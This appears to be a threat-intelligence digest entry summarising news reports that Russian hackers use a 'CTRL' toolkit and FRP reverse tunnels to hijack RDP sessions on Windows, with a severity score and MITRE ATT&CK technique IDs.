Russian Hackers Use CTRL Toolkit for RDP Hijacking via FRP Tunnels

Severity: High (Score: 69.5)

Sources: Gbhackers, Thehackernews

Summary

Russian hackers have deployed a new remote access toolkit named 'CTRL' to hijack Remote Desktop Protocol (RDP) sessions. This toolkit utilizes FRP-based reverse tunnels to gain stealthy access to compromised Windows systems. The CTRL toolkit integrates methods for credential theft, keylogging, and RDP exploitation into a unified post-exploitation framework. Currently, it remains undetected by many public malware scanners, posing a significant risk to organizations using RDP. The attack primarily targets Windows systems, which are vulnerable to this new method of exploitation. The toolkit's silent operation allows attackers to maintain hands-on access without raising alarms. Organizations relying on RDP should be particularly vigilant against this emerging threat. The situation is ongoing, with no reported mitigation strategies available yet. Key Points: • Russian hackers are using a new toolkit called 'CTRL' for RDP hijacking. • The toolkit employs FRP-based reverse tunnels for stealthy access to Windows systems. • Current malware scanners are unable to detect the CTRL toolkit, increasing its threat level.

Key Entities

• Malware (attack_type)
• T1003 - OS Credential Dumping (mitre_attack)
• T1021 - Remote Services (mitre_attack)
• T1056 - Input Capture (mitre_attack)
• Windows (platform)
• CTRL (tool)
• CTRL Toolkit (tool)